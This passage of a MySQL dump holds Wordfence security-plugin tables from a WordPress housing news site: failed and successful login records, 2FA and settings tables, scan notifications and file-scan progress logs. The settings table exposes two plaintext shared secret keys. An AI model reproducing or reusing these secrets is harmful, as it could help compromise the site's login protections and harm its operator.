Firefox/62.0'),(955,1648,1624620651.166873,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���Z;*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(956,1649,1624620651.589675,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Z;*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(957,1650,1624620867.105214,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��QF�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(958,1651,1624620869.760912,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��QF�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(959,1652,1624621051.535738,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0����Nb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(960,1653,1624621051.831993,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����Nb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(961,1654,1624621281.876221,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���B�Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(962,1655,1624621283.597616,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���B�Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(963,1659,1624621499.042422,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��g�P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(964,1660,1624621502.165565,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(965,1661,1624621692.673570,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��.e �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(966,1662,1624621692.905604,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��.e �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(967,1663,1624621929.817611,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��l�\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(968,1664,1624621930.943294,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��l�\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(969,1667,1624622373.669481,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(970,1668,1624622374.339647,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(971,1669,1624622602.051265,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(972,1670,1624622602.984852,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(973,1676,1624874439.111383,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(974,1912,1628247926.095481,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36'),(975,1913,1628247928.821767,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36'),(976,2281,1629463910.658017,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'),(977,2319,1629710578.875752,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36');
/*!40000 ALTER TABLE `wp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfls_2fa_secrets`
--
DROP TABLE IF EXISTS `wp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_2fa_secrets` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned NOT NULL,
`secret` tinyblob NOT NULL,
`recovery` blob NOT NULL,
`ctime` int(10) unsigned NOT NULL,
`vtime` int(10) unsigned NOT NULL,
`mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
PRIMARY KEY (`id`),
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfls_2fa_secrets`
--
LOCK TABLES `wp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfls_settings`
--
DROP TABLE IF EXISTS `wp_wfls_settings`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_settings` (
`name` varchar(191) NOT NULL DEFAULT '',
`value` longblob DEFAULT NULL,
`autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfls_settings`
--
LOCK TABLES `wp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wp_wfls_settings` VALUES ('2fa-user-grace-period','10','yes'),('allow-disabling-ntp','1','yes'),('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('enable-woocommerce-integration','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1624358545','yes'),('ntp-failure-count','0','yes'),('ntp-offset','0.02129054069519','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','13278e14770b9b5ce55d6c7fdd66fd4cd5ad95347f858445abef9b6d90080320','yes'),('shared-symmetric-secret','729e999d3fb14b7a418a9093d1e58bc0a88d438b53e0505f6f0b5b6c2bc27381','yes'),('use-ntp','1','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfnotifications`
--
DROP TABLE IF EXISTS `wp_wfnotifications`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfnotifications` (
`id` varchar(32) NOT NULL DEFAULT '',
`new` tinyint(3) unsigned NOT NULL DEFAULT 1,
`category` varchar(255) NOT NULL,
`priority` int(11) NOT NULL DEFAULT 1000,
`ctime` int(10) unsigned NOT NULL,
`html` text NOT NULL,
`links` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfnotifications`
--
LOCK TABLES `wp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wp_wfnotifications` VALUES ('site-2YAAAAA',1,'wfplugin_updates',502,1631537672,'<a href=\"https://housing-today.co.uk/wp-admin/update-core.php\">An update is available for 2 plugins</a>','[]'),('site-AEAAAAA',0,'wfplugin_updates',502,1624889902,'<a href=\"https://housing-today.co.uk/wp-admin/update-core.php\">An update is available for WordPress (v5.7.2)</a>','[]'),('site-AIAAAAA',0,'wfplugin_scan',502,1624874436,'<a href=\"https://housing-today.co.uk/wp-adminadmin.php?page=WordfenceScan\">29 issues found in most recent scan</a>','[]'),('site-CUAAAAA',0,'wfplugin_scan',502,1624874588,'<a href=\"https://housing-today.co.uk/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>','[]'),('site-EMAAAAA',0,'wfplugin_scan',502,1624889902,'<a href=\"https://housing-today.co.uk/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-FEAAAAA',1,'wfplugin_scan',502,1631537673,'<a href=\"https://housing-today.co.uk/wp-admin/admin.php?page=WordfenceScan\">8 issues found in most recent scan</a>','[]'),('site-GUAAAAA',0,'wfplugin_updates',502,1629463971,'<a href=\"https://housing-today.co.uk/wp-admin/update-core.php\">An update is available for 3 themes</a>','[]');
/*!40000 ALTER TABLE `wp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfpendingissues`
--
DROP TABLE IF EXISTS `wp_wfpendingissues`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfpendingissues` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`time` int(10) unsigned NOT NULL,
`lastUpdated` int(10) unsigned NOT NULL,
`status` varchar(10) NOT NULL,
`type` varchar(20) NOT NULL,
`severity` tinyint(3) unsigned NOT NULL,
`ignoreP` char(32) NOT NULL,
`ignoreC` char(32) NOT NULL,
`shortMsg` varchar(255) NOT NULL,
`longMsg` text DEFAULT NULL,
`data` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `lastUpdated` (`lastUpdated`),
KEY `status` (`status`),
KEY `ignoreP` (`ignoreP`),
KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfpendingissues`
--
LOCK TABLES `wp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wp_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfreversecache`
--
DROP TABLE IF EXISTS `wp_wfreversecache`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfreversecache` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`host` varchar(255) NOT NULL,
`lastUpdate` int(10) unsigned NOT NULL,
PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfreversecache`
--
LOCK TABLES `wp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wp_wfreversecache` DISABLE KEYS */;
INSERT INTO `wp_wfreversecache` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�AC','crawl-66-249-65-67.googlebot.com',1631587564),('\0\0\0\0\0\0\0\0\0\0��B�AG','crawl-66-249-65-71.googlebot.com',1631544179),('\0\0\0\0\0\0\0\0\0\0��B�AI','crawl-66-249-65-73.googlebot.com',1631572075),('\0\0\0\0\0\0\0\0\0\0��B�Iw','crawl-66-249-73-119.googlebot.com',1631615593),('\0\0\0\0\0\0\0\0\0\0��B�Iy','crawl-66-249-73-121.googlebot.com',1631572074),('\0\0\0\0\0\0\0\0\0\0���n\r','194.110.13.14',1631473826);
/*!40000 ALTER TABLE `wp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfsnipcache`
--
DROP TABLE IF EXISTS `wp_wfsnipcache`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfsnipcache` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`IP` varchar(45) NOT NULL DEFAULT '',
`expiration` timestamp NOT NULL DEFAULT current_timestamp(),
`body` varchar(255) NOT NULL DEFAULT '',
`count` int(10) unsigned NOT NULL DEFAULT 0,
`type` int(10) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `expiration` (`expiration`),
KEY `IP` (`IP`),
KEY `type` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=848 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfsnipcache`
--
LOCK TABLES `wp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wp_wfsnipcache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfstatus`
--
DROP TABLE IF EXISTS `wp_wfstatus`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfstatus` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`ctime` double(17,6) unsigned NOT NULL,
`level` tinyint(3) unsigned NOT NULL,
`type` char(5) NOT NULL,
`msg` varchar(1000) NOT NULL,
PRIMARY KEY (`id`),
KEY `k1` (`ctime`),
KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=4736 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfstatus`
--
LOCK TABLES `wp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wp_wfstatus` DISABLE KEYS */;
INSERT INTO `wp_wfstatus` VALUES (3445,1629841858.579139,2,'info','5898 files indexed'),(3446,1629841863.383689,2,'info','Analyzed 100 files containing 1.6 MB of data so far'),(3447,1629841867.961492,2,'info','Analyzed 200 files containing 2.8 MB of data so far'),(3448,1629841872.437220,2,'info','Analyzed 300 files containing 3.98 MB of data so far'),(3449,1629841876.554871,2,'info','Analyzed 400 files containing 6.77 MB of data so far'),(3450,1629841880.887621,2,'info','Analyzed 500 files containing 7.67 MB of data so far'),(3451,1629841886.285534,2,'info','Analyzed 600 files containing 9.49 MB of data so far'),(3452,1629841889.594864,2,'info','Analyzed 700 files containing 11.62 MB of data so far'),(3453,1629841894.120623,2,'info','Analyzed 800 files containing 15.71 MB of data so far'),(3454,1629841897.430014,2,'info','Analyzed 900 files containing 18.57 MB of data so far'),(3455,1629841901.383161,2,'info','Analyzed 1000 files containing 22.1 MB of data so far'),(3456,1629841904.979607,2,'info','Analyzed 1100 files containing 22.8 MB of data so far'),(3457,1629841908.593581,2,'info','Analyzed 1200 files containing 24.47 MB of data so far'),(3458,1629841912.913118,2,'info','Analyzed 1300 files containing 30.54 MB of data so far'),(3459,1629841916.105496,2,'info','Analyzed 1400 files containing 32.66 MB of data so far'),(3460,1629841918.476876,2,'info','Analyzed 1500 files containing 33.25 MB of data so far'),(3461,1629841921.969212,2,'info','Analyzed 1600 files containing 34.64 MB of data so far'),(3462,1629841926.371578,2,'info','Analyzed 1700 files containing 35.09 MB of data so far'),(3463,1629841930.338425,2,'info','Analyzed 1800 files containing 35.51 MB of data so far'),(3464,1629841933.559463,2,'info','Analyzed 1900 files containing 35.83 MB of data so far'),(3465,1629841936.843758,2,'info','Analyzed 2000 files containing 36.36 MB of data so far'),(3466,1629841941.709034,2,'info','Analyzed 2100 files containing 38.47 MB of data so far'),(3467,1629841945.601021,2,'info','Analyzed 2200 files containing 41.87 MB of data so far'),(3468,1629841950.349324,2,'info','Analyzed 2300 files containing 44.21 MB of data so far'),(3469,1629841955.410760,2,'info','Analyzed 2400 files containing 45.13 MB of data so far'),(3470,1629841959.340413,2,'info','Analyzed 2500 files containing 45.32 MB of data so far'),(3471,1629841962.328139,2,'info','Analyzed 2600 files containing 45.8 MB of data so far'),(3472,1629841965.252887,2,'info','Analyzed 2700 files containing 46.11 MB of data so far'),(3473,1629841967.883975,2,'info','Analyzed 2800 files containing 46.36 MB of data so far'),(3474,1629841971.116971,2,'info','Analyzed 2900 files containing 46.93 MB of data so far'),(3475,1629841976.815463,2,'info','Analyzed 3000 files containing 47.68 MB of data so far'),(3476,1629841980.382068,2,'info','Analyzed 3100 files containing 47.89 MB of data so far'),(3477,1629841983.932651,2,'info','Analyzed 3200 files containing 47.93 MB of data so far'),(3478,1629841986.802559,2,'info','Analyzed 3300 files containing 48.4 MB of data so far'),(3479,1629841992.030536,2,'info','Analyzed 3400 files containing 52.93 MB of data so far'),(3480,1629841995.552656,2,'info','Analyzed 3500 files containing 54.51 MB of data so far'),(3481,1629841998.304694,2,'info','Analyzed 3600 files containing 57.96 MB of data so far'),(3482,1629842001.608898,2,'info','Analyzed 3700 files containing 59.04 MB of data so far'),(3483,1629842005.753371,2,'info','Analyzed 3800 files containing 63.78 MB of data so far'),(3484,1629842008.703489,2,'info','Analyzed 3900 files containing 70.45 MB of data so far'),(3485,1629842013.063192,2,'info','Analyzed 4000 files containing 76.18 MB of data so far'),(3486,1629842016.803923,2,'info','Analyzed 4100 files containing 81.89 MB of data so far'),(3487,1629842020.372299,2,'info','Analyzed 4200 files containing 88.28 MB of data so far'),(3488,1629842024.301115,2,'info','Analyzed 4300 files containing 96.14 MB of data so far'),(3489,1629842027.666129,2,'info','Analyzed 4400 files containing 96.82 MB of data so far'),(3490,1629842030.905796,2,'info','Analyzed 4500 files containing 97.05 MB of data so far'),(3491,1629842034.404110,2,'info','Analyzed 4600 files containing 97.2 MB of data so far'),(3492,1629842037.920256,2,'info','Analyzed 4700 files containing 97.32 MB of data so far'),(3493,1629842040.712487,2,'info','Analyzed 4800 files containing 97.61 MB of data so far'),(3494,1629842045.127660,2,'info','Analyzed 4900 files containing 99.59 MB of data so far'),(3495,1629842048.734355,2,'info','Analyzed 5000 files containing 102.55 MB of data so far'),(3496,1629842052.375947,2,'info','Analyzed 5100 files containing 104.4 MB of data so far'),(3497,1629842056.944403,2,'info','Analyzed 5200 files containing 106.02 MB of data so far'),(3498,1629842061.843579,2,'info','Analyzed 5300 files containing 115.91 MB of data so far'),(3499,1629842065.461630,2,'info','Analyzed 5400 files containing 119.26 MB of data so far'),(3500,1629842070.229299,2,'info','Analyzed 5500 files containing 121.5 MB of data so far'),(3501,1629842073.811966,2,'info','Analyzed 5600 files containing 124.38 MB of data so far'),(3502,1629842077.286210,2,'info','Analyzed 5700 files containing 127.24 MB of data so far'),(3503,1629842080.912350,2,'info','Analyzed 5800 files containing 128.54 MB of data so far'),(3504,1629842084.367709,2,'info','Analyzed 5898 files containing 130.16 MB of data.'),(3514,1629842088.793149,2,'info','Starting scan of file contents'),(3515,1629842089.861635,2,'info','Scanned contents of 24 additional files at 22.92 per second'),(3516,1629842090.878973,2,'info','Scanned contents of 61 additional files at 29.55 per second'),(3517,1629842091.881938,2,'info','Scanned contents of 94 additional files at 30.65 per second'),(3518,1629842092.933339,2,'info','Scanned contents of 121 additional files at 29.38 per second'),(3519,1629842093.940736,2,'info','Scanned contents of 151 additional files at 29.46 per second'),(3520,1629842094.976186,2,'info','Scanned contents of 180 additional files at 29.21 per second'),(3521,1629842095.996989,2,'info','Scanned contents of 212 additional files at 29.52 per second'),(3522,1629842097.007614,2,'info','Scanned contents of 243 additional files at 29.66 per second'),(3523,1629842098.027005,2,'info','Scanned contents of 274 additional files at 29.74 per second'),(3524,1629842099.028895,2,'info','Scanned contents of 298 additional files at 29.17 per second'),(3525,1629842100.043230,2,'info','Scanned contents of 327 additional files at 29.12 per second'),(3526,1629842101.754337,2,'info','Scanned contents of 361 additional files at 27.90 per second'),(3527,1629842102.757420,2,'info','Scanned contents of 387 additional files at 27.76 per second'),(3528,1629842103.770695,2,'info','Scanned contents of 427 additional files at 28.55 per second'),(3529,1629842104.810528,2,'info','Scanned contents of 459 additional files at 28.69 per second'),(3530,1629842105.831433,2,'info','Scanned contents of 489 additional files at 28.74 per second'),(3531,1629842106.619368,2,'info','Scanned contents of 524 additional files at 29.43 per second'),(3532,1629842106.621476,2,'info','Asking Wordfence to check URLs against malware list.'),(3533,1629842106.632050,2,'info','Checking 277 host keys against Wordfence scanning servers.'),(3534,1629842107.241201,2,'info','Done host key check.'),(3535,1629842107.465481,2,'info','Done file contents scan'),(3541,1629842107.885401,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3542,1629842107.887685,2,'info','Checking 236 host keys against Wordfence scanning servers.'),(3543,1629842108.466622,2,'info','Done host key check.'),(3544,1629842108.476896,2,'info','Done examining URLs'),(3549,1629842108.965559,2,'info','Starting password strength check on 1 user.'),(3556,1629842113.241427,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3557,1629842113.266648,2,'info','Done examining URLs'),(3559,1629842113.367339,1,'info','-------------------'),(3560,1629842113.369208,2,'info','Wordfence used 17.45 MB of memory for scan. Server peak memory usage was: 43.45 MB'),(3561,1629842113.379217,1,'info','Scan Complete. Scanned 5898 files, 8 plugins, 4 themes, 19 posts, 0 comments and 800 URLs in 4 minutes 28 seconds.'),(3564,1629895999.360645,1,'info','Initiating quick scan'),(3569,1629895999.580746,1,'info','-------------------'),(3570,1629895999.623545,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(3571,1629895999.641465,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3574,1629982426.966566,1,'info','Initiating quick scan'),(3579,1629982427.308235,1,'info','-------------------'),(3580,1629982427.340725,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(3581,1629982427.361233,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3584,1630068831.085044,1,'info','Initiating quick scan'),(3589,1630068831.328822,1,'info','-------------------'),(3590,1630068831.350453,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(3591,1630068831.361877,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3593,1630101178.472786,1,'info','Scheduled Wordfence scan starting at Friday 27th of August 2021 09:52:58 PM'),(3595,1630101180.000984,1,'info','Contacting Wordfence to initiate scan'),(3602,1630101187.628420,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(3603,1630101187.642215,2,'info','The disk has 3461211.23 MB available'),(3611,1630101188.115920,2,'info','Including files that are outside the WordPress installation in the scan.'),(3612,1630101188.118742,2,'info','Getting plugin list from WordPress'),(3613,1630101188.143537,2,'info','Found 7 plugins'),(3614,1630101188.154640,2,'info','Getting theme list from WordPress'),(3615,1630101188.204959,2,'info','Found 4 themes'),(3627,1630101190.872201,2,'info','500 files indexed'),(3628,1630101191.064829,2,'info','1000 files indexed'),(3629,1630101191.246561,2,'info','1500 files indexed'),(3630,1630101191.411392,2,'info','2000 files indexed'),(3631,1630101191.649786,2,'info','2500 files indexed'),(3632,1630101191.860365,2,'info','3000 files indexed'),(3633,1630101192.055250,2,'info','3500 files indexed'),(3634,1630101192.251166,2,'info','4000 files indexed'),(3635,1630101192.381685,2,'info','4500 files indexed'),(3636,1630101192.551460,2,'info','5000 files indexed'),(3637,1630101192.708897,2,'info','5500 files indexed'),(3638,1630101192.850889,2,'info','5898 files indexed'),(3639,1630101199.680485,2,'info','Analyzed 100 files containing 1.6 MB of data so far'),(3640,1630101206.158601,2,'info','Analyzed 200 files containing 2.8 MB of data so far'),(3641,1630101212.045108,2,'info','Analyzed 300 files containing 3.98 MB of data so far'),(3642,1630101218.763487,2,'info','Analyzed 400 files containing 6.77 MB of data so far'),(3643,1630101225.442652,2,'info','Analyzed 500 files containing 7.67 MB of data so far'),(3644,1630101232.386506,2,'info','Analyzed 600 files containing 9.49 MB of data so far'),(3645,1630101239.756020,2,'info','Analyzed 700 files containing 11.62 MB of data so far'),(3646,1630101246.060124,2,'info','Analyzed 800 files containing 15.71 MB of data so far'),(3647,1630101252.915444,2,'info','Analyzed 900 files containing 18.57 MB of data so far'),(3648,1630101259.462858,2,'info','Analyzed 1000 files containing 22.1 MB of data so far'),(3649,1630101267.071982,2,'info','Analyzed 1100 files containing 22.8 MB of data so far'),(3650,1630101276.527683,2,'info','Analyzed 1200 files containing 24.47 MB of data so far'),(3651,1630101283.469119,2,'info','Analyzed 1300 files containing 30.54 MB of data so far'),(3652,1630101289.187769,2,'info','Analyzed 1400 files containing 32.66 MB of data so far'),(3653,1630101296.807960,2,'info','Analyzed 1500 files containing 33.25 MB of data so far'),(3654,1630101302.249578,2,'info','Analyzed 1600 files containing 34.64 MB of data so far'),(3655,1630101308.604581,2,'info','Analyzed 1700 files containing 35.09 MB of data so far'),(3656,1630101315.227648,2,'info','Analyzed 1800 files containing 35.51 MB of data so far'),(3657,1630101323.817711,2,'info','Analyzed 1900 files containing 35.83 MB of data so far'),(3658,1630101330.605954,2,'info','Analyzed 2000 files containing 36.36 MB of data so far'),(3659,1630101337.635282,2,'info','Analyzed 2100 files containing 38.47 MB of data so far'),(3660,1630101344.389197,2,'info','Analyzed 2200 files containing 41.87 MB of data so far'),(3661,1630101351.278657,2,'info','Analyzed 2300 files containing 44.21 MB of data so far'),(3662,1630101357.841059,2,'info','Analyzed 2400 files containing 45.13 MB of data so far'),(3663,1630101363.132160,2,'info','Analyzed 2500 files containing 45.32 MB of data so far'),(3664,1630101368.748097,2,'info','Analyzed 2600 files containing 45.8 MB of data so far'),(3665,1630101372.274777,2,'info','Analyzed 2700 files containing 46.11 MB of data so far'),(3666,1630101377.128382,2,'info','Analyzed 2800 files containing 46.36 MB of data so far'),(3667,1630101383.379377,2,'info','Analyzed 2900 files containing 46.93 MB of data so far'),(3668,1630101388.465850,2,'info','Analyzed 3000 files containing 47.68 MB of data so far'),(3669,1630101395.333142,2,'info','Analyzed 3100 files containing 47.89 MB of data so far'),(3670,1630101401.846251,2,'info','Analyzed 3200 files containing 47.93 MB of data so far'),(3671,1630101408.473642,2,'info','Analyzed 3300 files containing 48.4 MB of data so far'),(3672,1630101416.426577,2,'info','Analyzed 3400 files containing 52.93 MB of data so far'),(3673,1630101422.621153,2,'info','Analyzed 3500 files containing 54.51 MB of data so far'),(3674,1630101429.723170,2,'info','Analyzed 3600 files containing 57.96 MB of data so far'),(3675,1630101437.307556,2,'info','Analyzed 3700 files containing 59.04 MB of data so far'),(3676,1630101442.930183,2,'info','Analyzed 3800 files containing 63.78 MB of data so far'),(3677,1630101451.195955,2,'info','Analyzed 3900 files containing 70.45 MB of data so far'),(3678,1630101459.379390,2,'info','Analyzed 4000 files containing 76.18 MB of data so far'),(3679,1630101466.157674,2,'info','Analyzed 4100 files containing 81.89 MB of data so far'),(3680,1630101473.091067,2,'info','Analyzed 4200 files containing 88.28 MB of data so far'),(3681,1630101479.392643,2,'info','Analyzed 4300 files containing 96.14 MB of data so far'),(3682,1630101483.979057,2,'info','Analyzed 4400 files containing 96.82 MB of data so far'),(3683,1630101491.060053,2,'info','Analyzed 4500 files containing 97.05 MB of data so far'),(3684,1630101497.812166,2,'info','Analyzed 4600 files containing 97.2 MB of data so far'),(3685,1630101504.905432,2,'info','Analyzed 4700 files containing 97.32 MB of data so far'),(3686,1630101511.101267,2,'info','Analyzed 4800 files containing 97.61 MB of data so far'),(3687,1630101517.423184,2,'info','Analyzed 4900 files containing 99.59 MB of data so far'),(3688,1630101526.418041,2,'info','Analyzed 5000 files containing 102.55 MB of data so far'),(3689,1630101532.559332,2,'info','Analyzed 5100 files containing 104.4 MB of data so far'),(3690,1630101540.519913,2,'info','Analyzed 5200 files containing 106.02 MB of data so far'),(3691,1630101547.841173,2,'info','Analyzed 5300 files containing 115.91 MB of data so far'),(3692,1630101553.889548,2,'info','Analyzed 5400 files containing 119.26 MB of data so far'),(3693,1630101559.435302,2,'info','Analyzed 5500 files containing 121.5 MB of data so far'),(3694,1630101565.393190,2,'info','Analyzed 5600 files containing 124.38 MB of data so far'),(3695,1630101570.985360,2,'info','Analyzed 5700 files containing 127.24 MB of data so far'),(3696,1630101574.032708,2,'info','Analyzed 5800 files containing 